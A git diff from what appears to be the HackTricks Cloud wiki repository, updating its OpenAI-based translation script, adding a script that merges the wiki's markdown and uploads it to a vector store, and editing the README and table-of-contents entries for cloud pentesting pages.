REFS_JSON.write_text(json.dumps(refs_per_path, indent=2, ensure_ascii=False) + "\n", encoding="utf-8")
print(f"Wrote {REFS_JSON} with {len(refs_per_path)} files.")
if __name__ == "__main__":
main()

View File

@@ -12,15 +12,25 @@ from tqdm import tqdm #pip3 install tqdm
import traceback
MASTER_BRANCH = "master"
VERBOSE = True
MAX_TOKENS = 10000 #gpt-4-1106-preview
MAX_TOKENS = 50000 #gpt-4-1106-preview
DISALLOWED_SPECIAL = "<|endoftext|>"
REPLACEMENT_TOKEN = "<END_OF_TEXT>"
def _sanitize(text: str) -> str:
"""
Replace the reserved tiktoken token with a harmless placeholder.
Called everywhere a string can flow into tiktoken.encode() or the
OpenAI client.
"""
return text.replace(DISALLOWED_SPECIAL, REPLACEMENT_TOKEN)
def reportTokens(prompt, model):
encoding = tiktoken.encoding_for_model(model)
# print number of tokens in light gray, with first 50 characters of prompt in green. if truncated, show that it is truncated
#print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
prompt = _sanitize(prompt)
return len(encoding.encode(prompt))
@@ -36,35 +46,37 @@ def get_branch_files(branch):
files = result.stdout.decode().splitlines()
return set(files)
def delete_unique_files(branch):
def get_unused_files(branch):
"""Delete files that are unique to branch2."""
# Get the files in each branch
files_branch1 = get_branch_files(MASTER_BRANCH)
files_branch2 = get_branch_files(branch)
files_branch_master = get_branch_files(MASTER_BRANCH)
files_branch_lang = get_branch_files(branch)
# Find the files that are in branch2 but not in branch1
unique_files = files_branch2 - files_branch1
unique_files = files_branch_lang - files_branch_master
if unique_files:
# Switch to the second branch
subprocess.run(["git", "checkout", branch])
# Delete the unique files from the second branch
for file in unique_files:
subprocess.run(["git", "rm", file])
subprocess.run(["git", "checkout", MASTER_BRANCH])
print(f"[+] Deleted {len(unique_files)} files from branch: {branch}")
return unique_files
def cp_translation_to_repo_dir_and_check_gh_branch(branch, temp_folder, translate_files):
"""
Get the translated files from the temp folder and copy them to the repo directory in the expected branch.
Also remove all the files that are not in the master branch.
"""
branch_exists = subprocess.run(['git', 'show-ref', '--verify', '--quiet', 'refs/heads/' + branch])
# If branch doesn't exist, create it
if branch_exists.returncode != 0:
subprocess.run(['git', 'checkout', '-b', branch])
else:
subprocess.run(['git', 'checkout', branch])
# Get files to delete
files_to_delete = get_unused_files(branch)
# Delete files
for file in files_to_delete:
os.remove(file)
print(f"[+] Deleted {file}")
# Walk through source directory
for dirpath, dirnames, filenames in os.walk(temp_folder):
@@ -79,32 +91,72 @@ def cp_translation_to_repo_dir_and_check_gh_branch(branch, temp_folder, translat
for file_name in filenames:
src_file = os.path.join(dirpath, file_name)
shutil.copy2(src_file, dest_path)
print(f"Translated files copied to branch: {branch}")
if not "/images/" in src_file and not "/theme/" in src_file:
print(f"[+] Copied from {src_file} to {file_name}")
if translate_files:
subprocess.run(['git', 'add', "-A"])
subprocess.run(['git', 'commit', '-m', f"Translated {translate_files} to {branch}"[:72]])
subprocess.run(['git', 'checkout', MASTER_BRANCH])
print("Commit created and moved to master branch")
commit_and_push(translate_files, branch)
else:
print("No commiting anything, leaving in language branch")
def commit_and_push(translate_files, branch):
# Define the commands we want to run
commands = [
['git', 'add', '-A'],
['git', 'commit', '-m', f"Translated {translate_files} to {branch}"[:72]],
['git', 'push', '--set-upstream', 'origin', branch],
]
for cmd in commands:
result = subprocess.run(cmd, capture_output=True, text=True)
# Print stdout and stderr (if any)
if result.stdout:
print(f"STDOUT for {cmd}:\n{result.stdout}")
if "nothing to commit" in result.stdout.lower():
print("Nothing to commit, leaving")
exit(0)
if result.stderr:
print(f"STDERR for {cmd}:\n{result.stderr}")
# Check for errors
if result.returncode != 0:
raise RuntimeError(
f"Command `{cmd}` failed with exit code {result.returncode}"
)
print("Commit created and pushed")
def translate_text(language, text, file_path, model, cont=0, slpitted=False, client=None):
if not text:
return text
messages = [
{"role": "system", "content": "You are a professional hacker, translator and writer. You write everything super clear and as concise as possible without loosing information. Do not return invalid Unicode output."},
{"role": "system", "content": f"The following is content from a hacking book about hacking techiques. The following content is from the file {file_path}. Translate the relevant English text to {language} and return the translation keeping excatly the same markdown and html syntax. Do not translate things like code, hacking technique names, hacking word, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, and markdown tags. Also don't add any extra stuff apart from the translation and markdown syntax."},
{"role": "system", "content": "You are a professional hacker, translator and writer. You translate everything super clear and as concise as possible without loosing information. Do not return invalid Unicode output and do not translate markdown or html tags or links."},
{"role": "system", "content": f"""The following is content from a hacking book about technical hacking techiques. The following given content is from the file {file_path}.
Translate the relevant English text to {language} and return the translation keeping exactly the same markdown and html syntax and following this guidance:
- Don't translate things like code, hacking technique names, common hacking words, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, links and markdown tags.
- Don't translate links or paths, e.g. if a link or ref is to "lamda-post-exploitation.md" don't translate that path to the language.
- Don't translate or modify tags, links, refs and paths like in:
- {{#tabs}}
- {{#tab name="Method1"}}
- {{#ref}}\ngeneric-methodologies-and-resources/pentesting-methodology.md\n{{#endref}}
- {{#include ./banners/hacktricks-training.md}}
- {{#ref}}macos-tcc-bypasses/{{#endref}}
- {{#ref}}0.-basic-llm-concepts.md{{#endref}}
- Don't translate any other tag, just return markdown and html content as is.
Also don't add any extra stuff in your response that is not part of the translation and markdown syntax."""},
{"role": "user", "content": text},
]
try:
response = client.chat.completions.create(
model=model,
messages=messages,
temperature=0
temperature=1 # 1 because gpt-5 doesn't support other
)
except Exception as e:
print("Python Exception: " + str(e))
@@ -149,6 +201,9 @@ def translate_text(language, text, file_path, model, cont=0, slpitted=False, cli
return translate_text(language, text, file_path, model, cont, False, client)
response_message = response.choices[0].message.content.strip()
response_message = response_message.replace("bypassy", "bypasses") # PL translations translates that from time to time
response_message = response_message.replace("Bypassy", "Bypasses")
response_message = response_message.replace("-privec.md", "-privesc.md") # PL translations translates that from time to time
# Sometimes chatgpt modified the number of "#" at the beginning of the text, so we need to fix that. This is specially important for the first line of the MD that mucst have only 1 "#"
cont2 = 0
@@ -170,9 +225,11 @@ def split_text(text, model):
chunks = []
chunk = ''
in_code_block = False
in_ref = False
for line in lines:
# If we are in a code block, just add the code to the chunk
# Keep code blocks as one chunk
if line.startswith('```'):
# If we are in a code block, finish it with the "```"
@@ -188,8 +245,24 @@ def split_text(text, model):
chunk += line + '\n'
continue
"""
Prevent refs using `` like:
{{#ref}}
../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md`
{{#endref}}
"""
if line.startswith('{{#ref}}'):
in_ref = True
if in_ref:
line = line.replace("`", "")
if line.startswith('{{#endref}}'):
in_ref = False
# If new section, see if we should be splitting the text
if (line.startswith('#') and reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS*0.8) or \
reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS:
@@ -202,23 +275,30 @@ def split_text(text, model):
return chunks
def copy_gitbook_dir(source_path, dest_path):
folder_name = ".gitbook/"
source_folder = os.path.join(source_path, folder_name)
destination_folder = os.path.join(dest_path, folder_name)
if not os.path.exists(source_folder):
print(f"Error: {source_folder} does not exist.")
else:
# Copy the .gitbook folder
shutil.copytree(source_folder, destination_folder)
print(f"Copied .gitbook folder from {source_folder} to {destination_folder}")
def copy_dirs(source_path, dest_path, folder_names):
for folder_name in folder_names:
source_folder = os.path.join(source_path, folder_name)
destination_folder = os.path.join(dest_path, folder_name)
if not os.path.exists(source_folder):
print(f"Error: {source_folder} does not exist.")
else:
# Copy the theme folder
shutil.copytree(source_folder, destination_folder)
print(f"Copied {folder_name} folder from {source_folder} to {destination_folder}")
def copy_summary(source_path, dest_path):
file_name = "src/SUMMARY.md"
source_filepath = os.path.join(source_path, file_name)
dest_filepath = os.path.join(dest_path, file_name)
shutil.copy2(source_filepath, dest_filepath)
print("[+] Copied SUMMARY.md")
def move_files_to_push(source_path, dest_path, relative_file_paths):
for file_path in relative_file_paths:
source_filepath = os.path.join(source_path, file_path)
dest_filepath = os.path.join(dest_path, file_path)
if not os.path.exists(source_filepath):
print(f"Error: {source_filepath} does not exist.")
else:
shutil.copy2(source_filepath, dest_filepath)
print(f"[+] Copied {file_path}")
def copy_files(source_path, dest_path):
file_names = ["src/SUMMARY.md", "hacktricks-preprocessor.py", "book.toml", ".gitignore", "src/robots.txt"]
move_files_to_push(source_path, dest_path, file_names)
def translate_file(language, file_path, file_dest_path, model, client):
global VERBOSE
@@ -234,7 +314,7 @@ def translate_file(language, file_path, file_dest_path, model, client):
translated_content = ''
start_time = time.time()
for chunk in content_chunks:
# Don't trasnlate code blocks
# Don't translate code blocks
if chunk.startswith('```'):
translated_content += chunk + '\n'
else:
@@ -248,9 +328,10 @@ def translate_file(language, file_path, file_dest_path, model, client):
f.write(translated_content)
#if VERBOSE:
print(f"Page {file_path} translated in {elapsed_time:.2f} seconds")
print(f"Page {file_path} translated in {file_dest_path} in {elapsed_time:.2f} seconds")
"""
def translate_directory(language, source_path, dest_path, model, num_threads, client):
all_markdown_files = []
for subdir, dirs, files in os.walk(source_path):
@@ -280,17 +361,17 @@ def translate_directory(language, source_path, dest_path, model, num_threads, cl
tb = traceback.format_exc()
print(f'Translation generated an exception: {exc}')
print("Traceback:", tb)
"""
if __name__ == "__main__":
print("- Version 1.1.1")
print("- Version 2.0.0")
# Set up argparse
parser = argparse.ArgumentParser(description='Translate gitbook and copy to a new branch.')
parser.add_argument('-d', '--directory', action='store_true', help='Translate a full directory.')
#parser.add_argument('-d', '--directory', action='store_true', help='Translate a full directory.')
parser.add_argument('-l', '--language', required=True, help='Target language for translation.')
parser.add_argument('-b', '--branch', required=True, help='Branch name to copy translated files.')
parser.add_argument('-k', '--api-key', required=True, help='API key to use.')
parser.add_argument('-m', '--model', default="gpt-4o-mini", help='The openai model to use. By default: gpt-4o-mini')
parser.add_argument('-m', '--model', default="gpt-5-mini", help='The openai model to use. By default: gpt-5-mini')
parser.add_argument('-o', '--org-id', help='The org ID to use (if not set the default one will be used).')
parser.add_argument('-f', '--file-paths', help='If this is set, only the indicated files will be translated (" , " separated).')
parser.add_argument('-n', '--dont-cd', action='store_false', help="If this is true, the script won't change the current directory.")
@@ -345,7 +426,7 @@ if __name__ == "__main__":
translate_files = None # Need to initialize it here to avoid error
if args.file_paths:
# Translate only the indicated file
translate_files = [f for f in args.file_paths.split(' , ') if f]
translate_files = list(set([f.strip() for f in args.file_paths.split(',') if f]))
for file_path in translate_files:
#with tqdm(total=len(all_markdown_files), desc="Translating Files") as pbar:
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
@@ -359,23 +440,21 @@ if __name__ == "__main__":
#pbar.update()
except Exception as exc:
print(f'Translation generated an exception: {exc}')
# Delete possibly removed files from the master branch
delete_unique_files(branch)
elif args.directory:
#elif args.directory:
# Translate everything
translate_directory(language, source_folder, dest_folder, model, num_threads, client)
#translate_directory(language, source_folder, dest_folder, model, num_threads, client)
else:
print("You need to indicate either a directory or a list of files to translate.")
exit(1)
exit(0)
# Copy summary
copy_summary(source_folder, dest_folder)
# Copy Summary
copy_files(source_folder, dest_folder)
# Copy .gitbook folder
copy_gitbook_dir(source_folder, dest_folder)
folder_names = ["theme/", "src/images/"]
copy_dirs(source_folder, dest_folder, folder_names)
# Create the branch and copy the translated files
cp_translation_to_repo_dir_and_check_gh_branch(branch, dest_folder, translate_files)

297
scripts/upload_ht_to_ai.py Normal file
View File

@@ -0,0 +1,297 @@
import os
import requests
import zipfile
import tempfile
import time
import glob
import re
from openai import OpenAI
# Initialize OpenAI client
client = OpenAI(api_key=os.getenv("MY_OPENAI_API_KEY"))
# Vector Store ID
VECTOR_STORE_ID = "vs_67e9f92e8cc88191911be54f81492fb8"
# --------------------------------------------------
# Step 1: Download and Extract Markdown Files
# --------------------------------------------------
def download_zip(url, save_path):
print(f"Downloading zip from: {url}")
response = requests.get(url)
response.raise_for_status() # Ensure the download succeeded
with open(save_path, "wb") as f:
f.write(response.content)
print(f"Downloaded zip from: {url}")
def extract_markdown_files(zip_path, extract_dir):
print(f"Extracting zip: {zip_path} to {extract_dir}")
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(extract_dir)
# Recursively find all .md files
md_files = glob.glob(os.path.join(extract_dir, "**", "*.md"), recursive=True)
return md_files
# Repository URLs
hacktricks_url = "https://github.com/HackTricks-wiki/hacktricks/archive/refs/heads/master.zip"
hacktricks_cloud_url = "https://github.com/HackTricks-wiki/hacktricks-cloud/archive/refs/heads/main.zip"
# Temporary directory for downloads and extraction
temp_dir = tempfile.mkdtemp()
try:
# Download zip archives
print("Downloading Hacktricks repositories...")
hacktricks_zip = os.path.join(temp_dir, "hacktricks.zip")
hacktricks_cloud_zip = os.path.join(temp_dir, "hacktricks_cloud.zip")
download_zip(hacktricks_url, hacktricks_zip)
download_zip(hacktricks_cloud_url, hacktricks_cloud_zip)
# Extract the markdown files
hacktricks_extract_dir = os.path.join(temp_dir, "hacktricks")
hacktricks_cloud_extract_dir = os.path.join(temp_dir, "hacktricks_cloud")
md_files_hacktricks = extract_markdown_files(hacktricks_zip, hacktricks_extract_dir)
md_files_hacktricks_cloud = extract_markdown_files(hacktricks_cloud_zip, hacktricks_cloud_extract_dir)
all_md_files = md_files_hacktricks + md_files_hacktricks_cloud
print(f"Found {len(all_md_files)} markdown files.")
finally:
# Optional cleanup of temporary files after processing
# shutil.rmtree(temp_dir)
pass
# --------------------------------------------------
# Step 2: Remove All Existing Files in the Vector Store
# --------------------------------------------------
# List current files in the vector store and delete each one.
existing_files = list(client.vector_stores.files.list(VECTOR_STORE_ID))
print(f"Found {len(existing_files)} files in the vector store. Removing them...")
for file_obj in existing_files:
# Delete the underlying file object; this removes it from the vector store.
try:
client.files.delete(file_id=file_obj.id)
print(f"Deleted file: {file_obj.id}")
time.sleep(1) # Give it a moment to ensure the deletion is processed
except Exception as e:
# Handle potential errors during deletion
print(f"Error deleting file {file_obj.id}: {e}")
# ----------------------------------------------------
# Step 3: Clean markdown Files
# ----------------------------------------------------
# Clean markdown files and marge them so it's easier to
# uplaod to the vector store.
def clean_and_merge_md_files(start_folder, exclude_keywords, output_file):
def clean_file_content(file_path):
"""Clean the content of a single file and return the cleaned lines."""
with open(file_path, "r", encoding="utf-8") as f:
content = f.readlines()
cleaned_lines = []
inside_hint = False
for i,line in enumerate(content):
# Skip lines containing excluded keywords
if any(keyword in line for keyword in exclude_keywords):
continue
# Detect and skip {% hint %} ... {% endhint %} blocks
if "{% hint style=\"success\" %}" in line and "Learn & practice" in content[i+1]:
inside_hint = True
if "{% endhint %}" in line:
inside_hint = False
continue
if inside_hint:
continue
if line.startswith("#") and "reference" in line.lower(): #If references part reached, just stop reading the file
break
# Skip lines with <figure> ... </figure>
if re.match(r"<figure>.*?</figure>", line):
continue
# Add the line if it passed all checks
cleaned_lines.append(line.rstrip())
# Remove excess consecutive empty lines
cleaned_lines = remove_consecutive_empty_lines(cleaned_lines)
return cleaned_lines
def remove_consecutive_empty_lines(lines):
"""Allow no more than one consecutive empty line."""
cleaned_lines = []
previous_line_empty = False
for line in lines:
if line.strip() == "":
if not previous_line_empty:
cleaned_lines.append("")
previous_line_empty = True
else:
cleaned_lines.append(line)
previous_line_empty = False
return cleaned_lines
def gather_files_in_order(start_folder):
"""Gather all .md files in a depth-first order."""
files = []
for root, _, filenames in os.walk(start_folder):
md_files = sorted([os.path.join(root, f) for f in filenames if f.endswith(".md") and f.lower() not in ["summary.md", "references.md"]])
files.extend(md_files)
return files
# Gather files in depth-first order
all_files = gather_files_in_order(start_folder)
# Process files and merge into a single output
with open(output_file, "w", encoding="utf-8") as output:
for file_path in all_files:
# Clean the content of the file
cleaned_content = clean_file_content(file_path)
# Skip saving if the cleaned file has fewer than 10 non-empty lines
if len([line for line in cleaned_content if line.strip()]) < 10:
continue
# Get the name of the file for the header
file_name = os.path.basename(file_path)
# Write header, cleaned content, and 2 extra new lines
output.write(f"### Start file: {file_name} ###\n\n")
output.write("\n".join(cleaned_content))
output.write("\n\n")
# Specify the starting folder and output file
start_folder = os.getcwd()
# Keywords to exclude from lines
exclude_keywords = [
"hacktricks-training.md",
"![](<", # Skip lines with images
"/images/" # Skip lines with images
"STM Cyber", # STM Cyber ads
"offer several valuable cybersecurity services", # STM Cyber ads
"and hack the unhackable", # STM Cyber ads
"blog.stmcyber.com", # STM Cyber ads
"RootedCON", # RootedCON ads
"rootedcon.com", # RootedCON ads
"the mission of promoting technical knowledge", # RootedCON ads
"Intigriti", # Intigriti ads
"intigriti.com", # Intigriti ads
"Trickest", # Trickest ads
"trickest.com", # Trickest ads,
"Get Access Today:",
"HACKENPROOF", # Hackenproof ads
"hackenproof.com", # Hackenproof ads
"HackenProof", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Hacking Insights:", # Hackenproof ads
"Engage with content that delves", # Hackenproof ads
"Real-Time Hack News:", # Hackenproof ads
"Keep up-to-date with fast-paced", # Hackenproof ads
"Latest Announcements:", # Hackenproof ads
"Stay informed with the newest bug", # Hackenproof ads
"start collaborating with top hackers today!", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Pentest-Tools", # Pentest-Tools.com ads
"pentest-tools.com", # Pentest-Tools.com ads
"perspective on your web apps, network, and", # Pentest-Tools.com ads
"report critical, exploitable vulnerabilities with real business impact", # Pentest-Tools.com ads
"SerpApi", # SerpApi ads
"serpapi.com", # SerpApi ads
"offers fast and easy real-time", # SerpApi ads
"plans includes access to over 50 different APIs for scraping", # SerpApi ads
"8kSec", # 8kSec ads
"academy.8ksec.io", # 8kSec ads
"Learn the technologies and skills required", # 8kSec ads
"WebSec", # WebSec ads
"websec.nl", # WebSec ads
"which means they do it all; Pentesting", # WebSec ads
]
# Clean and merge .md files
ht_file = os.path.join(tempfile.gettempdir(), "hacktricks.md")
htc_file = os.path.join(tempfile.gettempdir(), "hacktricks-cloud.md")
clean_and_merge_md_files(hacktricks_extract_dir, exclude_keywords, ht_file)
print(f"Merged content has been saved to: {ht_file}")
clean_and_merge_md_files(hacktricks_cloud_extract_dir, exclude_keywords, htc_file)
print(f"Merged content has been saved to: {htc_file}")
# ----------------------------------------------------
# Step 4: Upload All Markdown Files to the Vector Store
# ----------------------------------------------------
# Upload two files to the vector store.
# Uploading .md hacktricks files individually can be slow,
# so thats why we merged it before into just 2 files.
file_streams = []
ht_stream = open(ht_file, "rb")
file_streams.append(ht_stream)
htc_stream = open(htc_file, "rb")
file_streams.append(htc_stream)
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
time.sleep(60) # Sleep for a minute to ensure the upload is processed
ht_stream.close()
htc_stream.close()
""""This was to upload each .md independently, wich turned out to be a nightmare
# Ensure we don't exceed the maximum number of file streams
for file_path in all_md_files:
# Check if we have reached the maximum number of streams
if len(file_streams) >= 300:
print("Reached maximum number of file streams (300). Uploading current batch...")
# Upload the current batch before adding more files
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
print("Upload status:", file_batch.status)
print("File counts:", file_batch.file_counts)
# Clear the list for the next batch
file_streams = []
time.sleep(120) # Sleep for 2 minutes to avoid hitting API limits
try:
stream = open(file_path, "rb")
file_streams.append(stream)
except Exception as e:
print(f"Error opening {file_path}: {e}")
if file_streams:
# Upload files and poll for completion
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
print("Upload status:", file_batch.status)
print("File counts:", file_batch.file_counts)
else:
print("No markdown files to upload.")"
# Close all file streams
for stream in file_streams:
stream.close()
"""

1
searchindex.js Normal file

File diff suppressed because one or more lines are too long

View File

@@ -4,9 +4,10 @@
<figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
_HackTricks 标志与动效由_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logos & motion designed by_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
### Run HackTricks Cloud Locally
### 在本地运行 HackTricks Cloud
```bash
# Download latest version of hacktricks cloud
git clone https://github.com/HackTricks-wiki/hacktricks-cloud
@@ -33,27 +34,28 @@ export LANG="master" # Leave master for English
# Run the docker container indicating the path to the hacktricks-cloud folder
docker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c "mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0"
```
您的本地 HackTricks Cloud 副本将在一分钟后 **可通过 [http://localhost:3377](http://localhost:3377) 访问**
### **Pentesting CI/CD 方法论**
Your local copy of HackTricks Cloud will be **available at [http://localhost:3377](http://localhost:3377)** after a minute.
**在 HackTricks CI/CD Methodology 中,你将找到如何对与 CI/CD 活动相关的基础设施进行 pentest。** 阅读下列页面以获取**介绍:**
### **Pentesting CI/CD Methodology**
**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud 方法论
### Pentesting Cloud Methodology
** HackTricks Cloud Methodology 中,你将找到如何对云环境进行 pentest。** 阅读下列页面以获取**介绍:**
**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### 许可与免责声明
### License & Disclaimer
**请在以下处查看:**
**Check them in:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
### Github 统计
### Github Stats
![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)

View File

@@ -9,7 +9,6 @@
# 🏭 Pentesting CI/CD
- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
- [Docker Build Context Abuse in Cloud Envs](pentesting-ci-cd/docker-build-context-abuse.md)
- [Gitblit Security](pentesting-ci-cd/gitblit-security/README.md)
- [Ssh Auth Bypass](pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.md)
- [Github Security](pentesting-ci-cd/github-security/README.md)
@@ -42,7 +41,6 @@
- [Atlantis Security](pentesting-ci-cd/atlantis-security.md)
- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md)
- [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md)
- [Cloudflare Workers Pass Through Proxy Ip Rotation](pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md)
- [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md)
- [Okta Security](pentesting-ci-cd/okta-security/README.md)
- [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
@@ -57,7 +55,6 @@
# ⛈️ Pentesting Cloud
- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md)
- [Luks2 Header Malleability Null Cipher Abuse](pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md)
- [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md)
- [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md)
- [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md)
@@ -85,17 +82,14 @@
- [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md)
- [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md)
- [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md)
- [GCP - Apigee Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-apigee-post-exploitation.md)
- [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
- [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
- [GCP - Bigtable Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md)
- [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md)
- [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
- [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
- [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
- [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
- [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
- [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
- [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
- [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
- [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -104,6 +98,7 @@
- [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
- [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
- [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
- [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
- [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
- [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
- [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -112,9 +107,7 @@
- [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
- [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md)
- [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md)
- [GCP - Bigtable Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigtable-privesc.md)
- [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
- [GCP - Cloud Workstations Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md)
- [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
- [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
- [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
@@ -125,11 +118,9 @@
- [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
- [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
- [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
- [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
- [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
- [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
- [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
- [GCP - Firebase Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md)
- [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md)
- [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md)
- [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md)
@@ -138,7 +129,6 @@
- [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md)
- [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
- [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md)
